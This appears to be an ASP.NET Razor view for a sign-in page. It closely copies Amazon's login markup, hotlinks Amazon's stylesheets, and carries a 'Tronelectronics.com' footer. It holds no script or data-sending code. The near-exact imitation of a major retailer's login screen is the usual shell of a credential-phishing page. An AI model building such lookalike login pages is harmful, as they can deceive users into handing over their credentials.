@{
    Layout = null;
}

<!doctype html>
<html>
<head>
    <meta charset="utf-8">
    <title dir="ltr">Sign In</title>
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/61VVISjJvEL._RC|11Fd9tJOdtL.css,21ULbzscqzL.css,31Q3id-QR0L.css,31QszevPBSL.css_.css#AUIClients/AmazonUI.min" />
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/AuthenticationPortalAssets-858402f69099c2b6073a58bdde9eb47ca72c6d36._V2_.css#AUIClients/AuthenticationPortalAssets.secure.min" />
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/CVFAssets-e91ba5c6e67c58c7f9c4c413fa67697feade389e._V2_.css#AUIClients/CVFAssets.secure.min" />
</head>

<body class="ap-locale-en_US a-m-us a-aui_51744-c a-aui_57326-c a-aui_72554-c a-aui_83815-c a-aui_86171-c a-aui_96511-c a-aui_accessibility_49860-c a-aui_attr_validations_1_51371-c a-aui_bolt_62845-c a-aui_noopener_84118-c a-aui_ux_102912-c a-aui_ux_59374-c a-aui_ux_60000-c a-aui_ux_92006-c a-aui_ux_98513-c a-dex_92889-c">
    <div id="a-page">
        <div class="a-section a-padding-medium auth-workflow">
            <div class="a-section a-spacing-none auth-navbar">
                <div class="a-section a-spacing-medium a-text-center">
                    <a class="a-link-nav-icon" tabindex="-1" href="#">
                        <img alt="" class="profile-image" src="~/Assets/images/logo.png">
                    </a>
                </div>
            </div>
            <div id="authportal-center-section" class="a-section">
                <div id="authportal-main-section" class="a-section">
                    <div class="a-section auth-pagelet-container">
                        <div class="a-section a-spacing-base">
                            <div class="a-section">
                                <div class="a-section">
                                    <div class="a-box">
                                        <div class="a-box-inner a-padding-extra-large">
                                            <h1 class="a-spacing-small">
                                                Sign in
                                            </h1>
                                            <div class="a-row a-spacing-base">
                                                <label for="ap_email" class="a-form-label">
                                                    Email (phone for mobile accounts)
                                                </label>
                                                <input type="email" maxlength="128" id="ap_email" name="email" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field">
                                                <input type="password" id="ap-credential-autofill-hint" name="password" class="a-input-text hide">
                                                <div id="auth-email-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-none a-spacing-top-mini">
                                                    <div class="a-box-inner a-alert-container">
                                                        <i class="a-icon a-icon-alert"></i><div class="a-alert-content">
                                                            Enter your email or mobile phone number
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="a-section">
                                                <span id="continue" class="a-button a-button-span12 a-button-primary">
                                                    <span class="a-button-inner">
                                                        <input id="continue" tabindex="5" class="a-button-input" type="submit"><span id="continue-announce" class="a-button-text">
                                                            Continue
                                                        </span>
                                                    </span>
                                                </span>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="a-divider a-divider-break"><h5>New to us?</h5></div>
                            <span id="auth-create-account-link" class="a-button a-button-span12">
                                <span class="a-button-inner">
                                    <a id="createAccountSubmit" tabindex="6" href="#" class="a-button-text">
                                        Create your account
                                    </a>
                                </span>
                            </span>
                        </div>
                    </div>
                </div>
            </div>
            <div id="right-2">
            </div>
            <div class="a-section a-spacing-top-extra-large auth-footer">
                <div class="a-divider a-divider-section"><div class="a-divider-inner"></div></div>
                <div class="a-section a-spacing-small a-text-center a-size-mini">
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener noreferrer" href="#">
                        Conditions of Use
                    </a>
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener noreferrer" href="#">
                        Privacy Notice
                    </a>
                    <span class="auth-footer-seperator"></span>
                    <a class="a-link-normal" target="_blank" rel="noopener noreferrer" href="#">
                        Help
                    </a>
                    <span class="auth-footer-seperator"></span>
                </div>
                <div class="a-section a-spacing-none a-text-center">
                    <span class="a-size-mini a-color-secondary">
                        2017-2018, Tronelectronics.com, Inc. or its affiliates
                    </span>
                </div>
            </div>
        </div>
    </div>
</body>
</html>